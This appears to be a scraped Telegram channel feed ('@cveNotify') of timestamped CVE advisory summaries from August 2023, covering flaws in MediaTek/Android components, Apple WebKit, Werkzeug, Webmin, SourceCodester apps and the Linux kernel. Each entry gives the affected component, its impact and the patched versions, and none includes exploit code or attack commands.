🚨 CVE-2023-33912In Contacts service, there is a possible missing permission check.This could lead to local information disclosure with no additional execution privileges🎖@cveNotify |
|
| 2023-08-07 15:58:21 |
🚨 CVE-2023-33913In DRM/oemcrypto, there is a possible out of bounds write due to an incorrect calculation of buffer size.This could lead to remote escalation of privilege with System execution privileges needed🎖@cveNotify |
|
| 2023-08-07 15:58:20 |
🚨 CVE-2022-48579UnRAR before 6.2.3 allows extraction of files outside of the destination folder via symlink chains.🎖@cveNotify |
|
| 2023-08-07 15:58:16 |
🚨 CVE-2023-20780In keyinstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08017756; Issue ID: ALPS08017756.🎖@cveNotify |
|
| 2023-08-07 15:58:15 |
🚨 CVE-2023-20781In keyinstall, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS08017756; Issue ID: ALPS07905323.🎖@cveNotify |
|
| 2023-08-07 15:58:14 |
🚨 CVE-2023-20782In keyinstall, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07550104; Issue ID: ALPS07550103.🎖@cveNotify |
|
| 2023-08-07 15:58:13 |
🚨 CVE-2023-20783In keyinstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07826905; Issue ID: ALPS07826905.🎖@cveNotify |
|
| 2023-08-07 15:58:12 |
🚨 CVE-2023-20784In keyinstall, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07826989; Issue ID: ALPS07826989.🎖@cveNotify |
|
| 2023-08-07 10:58:40 |
🚨 CVE-2023-38592A logic issue was addressed with improved restrictions. This issue is fixed in iOS 16.6 and iPadOS 16.6, watchOS 9.6, tvOS 16.6, macOS Ventura 13.5. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-07 10:58:38 |
🚨 CVE-2023-38599A logic issue was addressed with improved state management. This issue is fixed in Safari 16.6, watchOS 9.6, iOS 15.7.8 and iPadOS 15.7.8, tvOS 16.6, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5. A website may be able to track sensitive user information.🎖@cveNotify |
|
| 2023-08-07 10:58:37 |
🚨 CVE-2023-38133The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may disclose sensitive information.🎖@cveNotify |
|
| 2023-08-07 10:58:36 |
🚨 CVE-2023-38594The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-07 10:58:34 |
🚨 CVE-2023-38597The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, macOS Ventura 13.5, Safari 16.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-07 10:58:33 |
🚨 CVE-2023-38572The issue was addressed with improved checks. This issue is fixed in iOS 15.7.8 and iPadOS 15.7.8, iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. A website may be able to bypass Same Origin Policy.🎖@cveNotify |
|
| 2023-08-07 10:58:32 |
🚨 CVE-2023-38595The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-07 10:58:30 |
🚨 CVE-2023-38600The issue was addressed with improved checks. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-07 10:58:29 |
🚨 CVE-2023-38611The issue was addressed with improved memory handling. This issue is fixed in iOS 16.6 and iPadOS 16.6, tvOS 16.6, macOS Ventura 13.5, Safari 16.6, watchOS 9.6. Processing web content may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-08-07 10:58:28 |
🚨 CVE-2023-23934Werkzeug is a comprehensive WSGI web application library. Browsers may allow "nameless" cookies that look like `=value` instead of `key=value`. A vulnerable browser may allow a compromised application on an adjacent subdomain to exploit this to set a cookie like `=__Host-test=bad` for another subdomain. Werkzeug prior to 2.2.3 will parse the cookie `=__Host-test=bad` as __Host-test=bad`. If a Werkzeug application is running next to a vulnerable or malicious subdomain which sets such a cookie using a vulnerable browser, the Werkzeug application will see the bad cookie value but the valid cookie key. The issue is fixed in Werkzeug 2.2.3.🎖@cveNotify |
|
| 2023-08-07 10:58:24 |
🚨 CVE-2023-25577Werkzeug is a comprehensive WSGI web application library. Prior to version 2.2.3, Werkzeug's multipart form data parser will parse an unlimited number of parts, including file parts. Parts can be a small amount of bytes, but each requires CPU time to parse and may use more memory as Python data. If a request can be made to an endpoint that accesses `request.data`, `request.form`, `request.files`, or `request.get_data(parse_form_data=False)`, it can cause unexpectedly high resource usage. This allows an attacker to cause a denial of service by sending crafted multipart data to an endpoint that will parse it. The amount of CPU time required can block worker processes from handling legitimate requests. The amount of RAM required can trigger an out of memory kill of the process. Unlimited file parts can use up memory and file handles. If many concurrent requests are sent continuously, this can exhaust or kill all available workers. Version 2.2.3 contains a patch for this issue.🎖@cveNotify |
|
| 2023-08-07 10:58:23 |
🚨 CVE-2023-0425ABB is aware of vulnerabilities in the product versions listed below. An update is available that resolvesthe reported vulnerabilities in the product versions under maintenance.An attacker who successfully exploited one or more of these vulnerabilities could cause the product tostop or make the product inaccessible. Numeric Range Comparison Without Minimum Check vulnerability in ABB Freelance controllers AC 700F (Controller modules), ABB Freelance controllers AC 900F (controller modules).This issue affects:Freelance controllers AC 700F: from 9.0;0 through V9.2 SP2, through Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019, through Freelance 2019 SP1, through Freelance 2019 SP1 FP1; Freelance controllers AC 900F: Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019, through Freelance 2019 SP1, through Freelance 2019 SP1 FP1.🎖@cveNotify |
|
| 2023-08-07 10:58:22 |
🚨 CVE-2023-0426ABB is aware of vulnerabilities in the product versions listed below. An update is available that resolvesthe reported vulnerabilities in the product versions under maintenance.An attacker who successfully exploited one or more of these vulnerabilities could cause the product tostop or make the product inaccessible. Stack-based Buffer Overflow vulnerability in ABB Freelance controllers AC 700F (conroller modules), ABB Freelance controllers AC 900F (controller modules).This issue affects: Freelance controllers AC 700F: from 9.0;0 through V9.2 SP2, through Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019 , through Freelance 2019 SP1, through Freelance 2019 SP1 FP1; Freelance controllers AC 900F: through Freelance 2013, through Freelance 2013SP1, through Freelance 2016, through Freelance 2016SP1, through Freelance 2019, through Freelance 2019 SP1, through Freelance 2019 SP1 FP1.🎖@cveNotify |
|
| 2023-08-07 10:58:21 |
🚨 CVE-2023-29984Null pointer dereference vulnerability exists in multiple vendors MFPs and printers which implement Debut web server 1.2 or 1.3. Processing a specially crafted request may lead an affected product to a denial-of-service (DoS) condition. As for the affected products/models/versions, see the detailed information provided by each vendor.🎖@cveNotify |
|
| 2023-08-07 10:58:20 |
🚨 CVE-2023-39903An issue was discovered in Fujitsu Software Infrastructure Manager (ISM) before 2.8.0.061. The ismsnap component (in this specific case at /var/log/fujitsu/ServerViewSuite/ism/FirmwareManagement/FirmwareManagement.log) allows insecure collection and storage of authorization credentials in cleartext. That occurs when users perform any ISM Firmware Repository Address setup test (Test the Connection), or regularly authorize against an already configured remote firmware repository site, as set up in ISM Firmware Repository Address. A privileged attacker is therefore able to potentially gather the associated ismsnap maintenance data, in the same manner as a trusted party allowed to export ismsnap data from ISM. The preconditions for an ISM installation to be generally vulnerable are that the Download Firmware (Firmware Repository Server) function is enabled and configured, and that the character \ (backslash) is used in a user credential (i.e., user/ID or password) of the remote proxy host / firmware repository server. NOTE: this may overlap CVE-2023-39379.🎖@cveNotify |
|
| 2023-08-07 05:58:35 |
🚨 CVE-2023-20789In jpeg, there is a possible information disclosure due to a missing bounds check. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07693193; Issue ID: ALPS07693193.🎖@cveNotify |
|
| 2023-08-07 05:58:34 |
🚨 CVE-2023-20793In apu, there is a possible memory corruption due to a missing bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07767818; Issue ID: ALPS07767818.🎖@cveNotify |
|
| 2023-08-07 05:58:33 |
🚨 CVE-2023-20796In power, there is a possible memory corruption due to an incorrect bounds check. This could lead to local denial of service with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07929790; Issue ID: ALPS07929790.🎖@cveNotify |
|
| 2023-08-07 05:58:28 |
🚨 CVE-2023-20798In pda, there is a possible out of bounds read due to an incorrect calculation of buffer size. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07147572; Issue ID: ALPS07421076.🎖@cveNotify |
|
| 2023-08-07 05:58:27 |
🚨 CVE-2023-20802In imgsys, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07420968; Issue ID: ALPS07420976.🎖@cveNotify |
|
| 2023-08-07 05:58:23 |
🚨 CVE-2023-20803In imgsys, there is a possible memory corruption due to improper input validation. This could lead to local escalation of privilege with System execution privileges needed. User interaction is needed for exploitation. Patch ID: ALPS07326455; Issue ID: ALPS07326374.🎖@cveNotify |
|
| 2023-08-07 05:58:22 |
🚨 CVE-2023-20806In hcp, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07340433; Issue ID: ALPS07537437.🎖@cveNotify |
|
| 2023-08-07 05:58:21 |
🚨 CVE-2023-20807In dpe, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07608433; Issue ID: ALPS07608433.🎖@cveNotify |
|
| 2023-08-07 05:58:18 |
🚨 CVE-2023-20808In OPTEE, there is a possible out of bounds write due to a missing bounds check. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03645895; Issue ID: DTV03645895.🎖@cveNotify |
|
| 2023-08-07 05:58:17 |
🚨 CVE-2023-20810In IOMMU, there is a possible information disclosure due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: DTV03692061; Issue ID: DTV03692061.🎖@cveNotify |
|
| 2023-08-07 05:58:16 |
🚨 CVE-2023-20812In wlan driver, there is a possible out of bounds write due to improper input validation. This could lead to local information disclosure with System execution privileges needed. User interaction is not needed for exploitation. Patch ID: ALPS07944987; Issue ID: ALPS07944987.🎖@cveNotify |
|
| 2023-08-07 00:58:11 |
🚨 CVE-2023-4191A vulnerability, which was classified as critical, has been found in SourceCodester Resort Reservation System 1.0. Affected by this issue is some unknown functionality of the file index.php. The manipulation of the argument page leads to file inclusion. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-236234 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-06 20:58:14 |
🚨 CVE-2023-4195PHP Remote File Inclusion in GitHub repository cockpit-hq/cockpit prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-06 20:58:13 |
🚨 CVE-2023-4196Cross-site Scripting (XSS) - Stored in GitHub repository cockpit-hq/cockpit prior to 2.6.3.🎖@cveNotify |
|
| 2023-08-06 19:06:20 |
CVE Notify pinned «https://t.me/malwr» |
|
| 2023-08-06 19:06:13 |
https://t.me/malwr |
|
| 2023-08-06 12:58:14 |
🚨 CVE-2023-4183A vulnerability has been found in SourceCodester Inventory Management System 1.0 and classified as problematic. This vulnerability affects unknown code of the file edit_update.php of the component Password Handler. The manipulation of the argument user_id leads to improper access controls. The attack can be initiated remotely. VDB-236218 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-06 12:58:13 |
🚨 CVE-2023-4182A vulnerability, which was classified as critical, was found in SourceCodester Inventory Management System 1.0. This affects an unknown part of the file edit_sell.php. The manipulation of the argument up_pid leads to sql injection. It is possible to initiate the attack remotely. The identifier VDB-236217 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-06 11:58:15 |
🚨 CVE-2023-37581Insufficient input validation and sanitation in Weblog Category name, Website About and File Upload features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: if you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. If you are running with untrusted users then you should upgrade to Roller 6.1.2 and you should disable Roller's File Upload feature.?🎖@cveNotify |
|
| 2023-08-06 11:58:14 |
🚨 CVE-2023-4180A vulnerability classified as critical was found in SourceCodester Free Hospital Management System for Small Practices 1.0. Affected by this vulnerability is an unknown functionality of the file /vm/login.php. The manipulation of the argument useremail/userpassword leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236215.🎖@cveNotify |
|
| 2023-08-06 11:58:13 |
🚨 CVE-2023-4177A vulnerability was found in EmpowerID up to 7.205.0.0. It has been rated as problematic. This issue affects some unknown processing of the component Multi-Factor Authentication Code Handler. The manipulation leads to information disclosure. The complexity of an attack is rather high. The exploitation is known to be difficult. Upgrading to version 7.205.0.1 is able to address this issue. It is recommended to upgrade the affected component. The identifier VDB-236213 was assigned to this vulnerability.🎖@cveNotify |
|
| 2023-08-06 05:58:13 |
🚨 CVE-2023-4173A vulnerability, which was classified as problematic, was found in mooSocial mooStore 3.1.6. Affected is an unknown function of the file /search/index. The manipulation of the argument q leads to cross site scripting. It is possible to launch the attack remotely. The identifier of this vulnerability is VDB-236208.🎖@cveNotify |
|
| 2023-08-06 01:58:55 |
🚨 CVE-2023-4172A vulnerability, which was classified as problematic, has been found in Chengdu Flash Flood Disaster Monitoring and Warning System 2.0. This issue affects some unknown processing of the file \Service\FileHandler.ashx. The manipulation of the argument FileDirectory leads to absolute path traversal. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-236207.🎖@cveNotify |
|
| 2023-08-05 22:59:59 |
🚨 CVE-2023-4188 SQL Injection in GitHub repository instantsoft/icms2 prior to 2.16.1-git.🎖@cveNotify |
|
| 2023-08-05 22:59:58 |
🚨 CVE-2023-4189Cross-site Scripting (XSS) - Reflected in GitHub repository instantsoft/icms2 prior to 2.16.1-git.🎖@cveNotify |
|
| 2023-08-05 21:00:02 |
🚨 CVE-2023-4170A vulnerability was found in DedeBIZ 6.2.10. It has been rated as problematic. Affected by this issue is some unknown functionality of the component Article Handler. The manipulation leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-236186 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-05 21:00:01 |
🚨 CVE-2023-33460There's a memory leak in yajl 2.1.0 with use of yajl_tree_parse function. which will cause out-of-memory in server and cause crash.🎖@cveNotify |
|
| 2023-08-05 20:59:57 |
🚨 CVE-2017-16516In the yajl-ruby gem 1.3.0 for Ruby, when a crafted JSON file is supplied to Yajl::Parser.new.parse, the whole ruby process crashes with a SIGABRT in the yajl_string_decode function in yajl_encode.c. This results in the whole ruby process terminating and potentially a denial of service.🎖@cveNotify |
|
| 2023-08-05 20:59:56 |
🚨 CVE-2023-4169A vulnerability was found in Ruijie RG-EW1200G 1.0(1)B1P5. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /api/sys/set_passwd of the component Administrator Password Handler. The manipulation leads to improper access controls. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-236185 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-05 20:59:55 |
🚨 CVE-2023-4187Cross-site Scripting (XSS) - Stored in GitHub repository instantsoft/icms2 prior to 2.16.1-git.🎖@cveNotify |
|
| 2023-08-05 20:00:24 |
🚨 CVE-2023-4167A vulnerability was found in Media Browser Emby Server 4.7.13.0 and classified as problematic. This issue affects some unknown processing of the file /web/. The manipulation leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. It is recommended to upgrade the affected component. The associated identifier of this vulnerability is VDB-236183.🎖@cveNotify |
|
| 2023-08-05 20:00:23 |
🚨 CVE-2022-4557Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Group Arge Energy and Control Systems Smartpower Web allows SQL Injection.This issue affects Smartpower Web: before 23.01.01.🎖@cveNotify |
|
| 2023-08-05 18:00:32 |
🚨 CVE-2023-39508Execution with Unnecessary Privileges, : Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow.The "Run Task" feature enables authenticated user to bypass some of the restrictions put in place. It allows to execute code in the webserver context as well as allows to bypas limitation of access the user has to certain DAGs. The "Run Task" feature is considered dangerous and it has been removed entirely in Airflow 2.6.0This issue affects Apache Airflow: before 2.6.0.🎖@cveNotify |
|
| 2023-08-05 12:00:35 |
🚨 CVE-2023-39508Execution with Unnecessary Privileges, : Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Software Foundation Apache Airflow.The "Run Task" feature enables authenticated user to bypass some of the restrictions put in place. It allows to execute code in the webserver context as well as allows to bypas limitation of access the user has to certain DAGs. The "Run Task" feature is considered dangerous and it has been removed entirely in Airflow 2.6.0This issue affects Apache Airflow: before 2.6.0.🎖@cveNotify |
|
| 2023-08-05 06:01:05 |
🚨 CVE-2023-30577AMANDA (Advanced Maryland Automatic Network Disk Archiver) before tag-community-3.5.4 mishandles argument checking for runtar.c, a different vulnerability than CVE-2022-37705.🎖@cveNotify |
|
| 2023-08-05 06:01:04 |
🚨 CVE-2023-20593An issue in “Zen 2” CPUs, under specific microarchitectural circumstances, may allow an attacker to potentially access sensitive information.🎖@cveNotify |
|
| 2023-08-05 06:01:03 |
🚨 CVE-2023-36133PHPJabbers Availability Booking Calendar 5.0 is vulnerable to User Account Takeover through username/password change.🎖@cveNotify |
|
| 2023-08-05 06:00:59 |
🚨 CVE-2023-36139In PHPJabbers Cleaning Business Software 1.0, lack of verification when changing an email address and/or password (on the Profile Page) allows remote attackers to take over accounts.🎖@cveNotify |
|
| 2023-08-05 06:00:58 |
🚨 CVE-2023-36121Cross Site Scripting vulnerability in e107 v.2.3.2 allows a remote attacker to execute arbitrary code via the description function in the SEO project.🎖@cveNotify |
|
| 2023-08-05 06:00:57 |
🚨 CVE-2023-3739Insufficient validation of untrusted input in Chromad in Google Chrome on ChromeOS prior to 115.0.5790.131 allowed a remote attacker to execute arbitrary code via a crafted shell script. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-08-05 06:00:53 |
🚨 CVE-2023-3740Insufficient validation of untrusted input in Themes in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to potentially serve malicious content to a user via a crafted background URL. (Chromium security severity: Low)🎖@cveNotify |
|
| 2023-08-05 06:00:52 |
🚨 CVE-2023-4116A vulnerability classified as problematic was found in PHP Jabbers Taxi Booking 2.0. Affected by this vulnerability is an unknown functionality of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-235963. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-05 06:00:51 |
🚨 CVE-2023-3738Inappropriate implementation in Autofill in Google Chrome prior to 115.0.5790.98 allowed a remote attacker to obfuscate security UI via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-08-05 06:00:47 |
🚨 CVE-2023-4114A vulnerability was found in PHP Jabbers Night Club Booking Software 1.0. It has been rated as problematic. This issue affects some unknown processing of the file /index.php. The manipulation of the argument index leads to cross site scripting. The attack may be initiated remotely. The identifier VDB-235961 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-05 06:00:46 |
🚨 CVE-2023-4112A vulnerability was found in PHP Jabbers Shuttle Booking Software 1.0. It has been classified as problematic. This affects an unknown part of the file /index.php. The manipulation leads to cross site scripting. It is possible to initiate the attack remotely. The associated identifier of this vulnerability is VDB-235959. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-08-05 06:00:45 |
🚨 CVE-2023-36255An issue in Eramba Limited Eramba Enterprise v.3.19.1 allows a remote attacker to execute arbitrary code via the path parameter in the URL.🎖@cveNotify |
|
| 2023-08-04 19:58:34 |
🚨 CVE-2023-37478pnpm is a package manager. It is possible to construct a tarball that, when installed via npm or parsed by the registry is safe, but when installed via pnpm is malicious, due to how pnpm parses tar archives. This can result in a package that appears safe on the npm registry or when installed via npm being replaced with a compromised or malicious version when installed via pnpm. This issue has been patched in version(s) 7.33.4 and 8.6.8.🎖@cveNotify |
|
| 2023-08-04 19:58:33 |
🚨 CVE-2023-26607In the Linux kernel 6.0.8, there is an out-of-bounds read in ntfs_attr_find in fs/ntfs/attrib.c.🎖@cveNotify |
|
| 2023-08-04 19:58:32 |
🚨 CVE-2022-1729A race condition was found the Linux kernel in perf_event_open() which can be exploited by an unprivileged user to gain root privileges. The bug allows to build several exploit primitives such as kernel address information leak, arbitrary execution, etc.🎖@cveNotify |
|
| 2023-08-04 19:58:28 |
🚨 CVE-2023-20583A potential power side-channel vulnerability inAMD processors may allow an authenticated attacker to monitor the CPU powerconsumption as the data in a cache line changes over time potentially resultingin a leak of sensitive information.🎖@cveNotify |
|
| 2023-08-04 19:58:27 |
🚨 CVE-2023-38560An integer overflow flaw was found in pcl/pl/plfont.c:418 in pl_glyph_name in ghostscript. This issue may allow a local attacker to cause a denial of service via transforming a crafted PCL file to PDF format.🎖@cveNotify |
|
| 2023-08-04 19:58:26 |
🚨 CVE-2023-31425A vulnerability in the fosexec command of Brocade Fabric OS after Brocade Fabric OS v9.1.0 and, before Brocade Fabric OS v9.1.1 could allow a local authenticated user to perform privilege escalation to root by breaking the rbash shell. Starting with Fabric OS v9.1.0, “root” account access is disabled.🎖@cveNotify |
|
| 2023-08-04 19:58:22 |
🚨 CVE-2023-31429Brocade Fabric OS before Brocade Fabric OS v9.1.1c, v9.2.0 contains a vulnerability when using various commands such as “chassisdistribute”, “reboot”, “rasman”, errmoduleshow, errfilterset, hassiscfgperrthreshold, supportshowcfgdisable and supportshowcfgenable commands that can cause the content of shell interpreted variables to be printed in the terminal.🎖@cveNotify |
|
| 2023-08-04 19:58:21 |
🚨 CVE-2023-36118Cross Site Scripting vulnerability in Faculty Evaulation System using PHP/MySQLi v.1.0 allows an attacker to execute arbitrary code via a crafted payload to the page parameter.🎖@cveNotify |
|
| 2023-08-04 19:58:20 |
🚨 CVE-2023-32302Silverstripe Framework is the MVC framework that powers Silverstripe CMS. When a new member record is created and a password is not set, an empty encrypted password is generated. As a result, if someone is aware of the existence of a member record associated with a specific email address, they can potentially attempt to log in using that empty password. Although the default member authenticator and login form require a non-empty password, alternative authentication methods might still permit a successful login with the empty password. This issue has been patched in versions 4.13.4 and 5.0.13.🎖@cveNotify |
|
| 2023-08-04 19:58:16 |
🚨 CVE-2023-34359ASUS RT-AX88U's httpd is subject to an unauthenticated DoS condition. A remote attacker can send a specially crafted request to the device which causes the httpd binary to crash within the "do_json_decode()" function of ej.c, resulting in a DoS condition.🎖@cveNotify |
|
| 2023-08-04 19:58:15 |
🚨 CVE-2022-47520An issue was discovered in the Linux kernel before 6.0.11. Missing offset validation in drivers/net/wireless/microchip/wilc1000/hif.c in the WILC1000 wireless driver can trigger an out-of-bounds read when parsing a Robust Security Network (RSN) information element from a Netlink packet.🎖@cveNotify |
|
| 2023-08-04 19:58:14 |
🚨 CVE-2022-4888The Checkout Fields Manager WordPress plugin before 1.0.2, Abandoned Cart Recovery WordPress plugin before 1.2.5, Custom Fields for WooCommerce WordPress plugin before 1.0.4, Custom Order Number WordPress plugin through 1.0.1, Custom Registration Forms Builder WordPress plugin before 1.0.2, Advanced Free Gifts WordPress plugin before 1.0.2, Gift Registry for WooCommerce WordPress plugin through 1.0.1, Image Watermark for WooCommerce WordPress plugin before 1.0.1, Order Approval for WooCommerce WordPress plugin before 1.1.0, Order Tracking for WooCommerce WordPress plugin before 1.0.2, Price Calculator for WooCommerce WordPress plugin through 1.0.3, Product Dynamic Pricing and Discounts WordPress plugin through 1.0.6, Product Labels and Stickers WordPress plugin through 1.0.1 have flawed CSRF checks in various places, which could allow attackers to make logged in users perform unwanted actions🎖@cveNotify |
|
| 2023-08-04 17:58:13 |
🚨 CVE-2023-36090** UNSUPPORTED WHEN ASSIGNED ** Authentication Bypass vulnerability in D-Link DIR-885L FW102b01 allows remote attackers to gain escalated privileges via phpcgi. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-08-04 17:58:12 |
🚨 CVE-2023-36092** UNSUPPORTED WHEN ASSIGNED ** Authentication Bypass vulnerability in D-Link DIR-859 FW105b03 allows remote attackers to gain escalated privileges via via phpcgi_main. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-08-04 17:58:11 |
🚨 CVE-2020-36763Cross Site Scripting (XSS) vulnerability in DuxCMS 2.1 allows remote attackers to run arbitrary code via the content, time, copyfrom parameters when adding or editing a post.🎖@cveNotify |
|
| 2023-08-04 14:58:31 |
🚨 CVE-2023-34916Fuge CMS v1.0 contains an Open Redirect vulnerability via /front/ProcessAct.java.🎖@cveNotify |
|
| 2023-08-04 14:58:30 |
🚨 CVE-2023-34917Fuge CMS v1.0 contains an Open Redirect vulnerability in member/RegisterAct.java.🎖@cveNotify |
|
| 2023-08-04 14:58:29 |
🚨 CVE-2023-37464OpenIDC/cjose is a C library implementing the Javascript Object Signing and Encryption (JOSE). The AES GCM decryption routine incorrectly uses the Tag length from the actual Authentication Tag provided in the JWE. The spec says that a fixed length of 16 octets must be applied. Therefore this bug allows an attacker to provide a truncated Authentication Tag and to modify the JWE accordingly. Users should upgrade to a version >= 0.6.2.2. Users unable to upgrade should avoid using AES GCM encryption and replace it with another encryption algorithm (e.g. AES CBC).🎖@cveNotify |
|
| 2023-08-04 14:58:27 |
🚨 CVE-2023-38305An issue was discovered in Webmin 2.021. The download functionality allows an attacker to exploit a Cross-Site Scripting (XSS) vulnerability. By providing a crafted download path containing a malicious payload, an attacker can inject arbitrary code, which is then executed within the context of the victim's browser when the download link is accessed.🎖@cveNotify |
|
| 2023-08-04 14:58:26 |
🚨 CVE-2023-38306An issue was discovered in Webmin 2.021. A Cross-site Scripting (XSS) Bypass vulnerability was discovered in the file upload functionality. Normally, the application restricts the upload of certain file types such as .svg, .php, etc., and displays an error message if a prohibited file type is detected. However, by following certain steps, an attacker can bypass these restrictions and inject malicious code.🎖@cveNotify |
|
| 2023-08-04 14:58:25 |
🚨 CVE-2023-38307An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the Users and Groups functionality. The vulnerability occurs when an authenticated user adds a new user and inserts an XSS payload into the user's real name.🎖@cveNotify |
|
| 2023-08-04 14:58:24 |
🚨 CVE-2023-38308An issue was discovered in Webmin 2.021. A Cross-Site Scripting (XSS) vulnerability was discovered in the HTTP Tunnel functionality when handling third-party domain URLs. By providing a crafted URL from a third-party domain, an attacker can inject malicious code. leading to the execution of arbitrary JavaScript code within the context of the victim's browser.🎖@cveNotify |
|
| 2023-08-04 14:58:22 |
🚨 CVE-2023-38309An issue was discovered in Webmin 2.021. A Reflected Cross-Site Scripting (XSS) vulnerability was discovered in the package search functionality. The vulnerability allows an attacker to inject a malicious payload in the "Search for Package" field, which gets reflected back in the application's response, leading to the execution of arbitrary JavaScript code within the context of the victim's browser.🎖@cveNotify |
|
| 2023-08-04 14:58:21 |
🚨 CVE-2023-38310An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the configuration settings of the system logs functionality. The vulnerability allows an attacker to store an XSS payload in the configuration settings of specific log files. This results in the execution of that payload whenever the affected log files are accessed.🎖@cveNotify |
|
| 2023-08-04 14:58:20 |
🚨 CVE-2023-38311An issue was discovered in Webmin 2.021. A Stored Cross-Site Scripting (XSS) vulnerability was discovered in the System Logs Viewer functionality. The vulnerability allows an attacker to store a malicious payload in the configuration field, triggering the execution of the payload when saving the configuration or when accessing the System Logs Viewer page.🎖@cveNotify |
|
| 2023-08-04 14:58:19 |
🚨 CVE-2023-34037VMware Horizon Server contains a HTTP request smuggling vulnerability. A malicious actor with network access may be able to perform HTTP smuggle requests.🎖@cveNotify |
|
| 2023-08-04 14:58:18 |
🚨 CVE-2023-34038VMware Horizon Server contains an information disclosure vulnerability. A malicious actor with network access may be able to access information relating to the internal network configuration.🎖@cveNotify |
|
| 2023-08-04 12:59:44 |
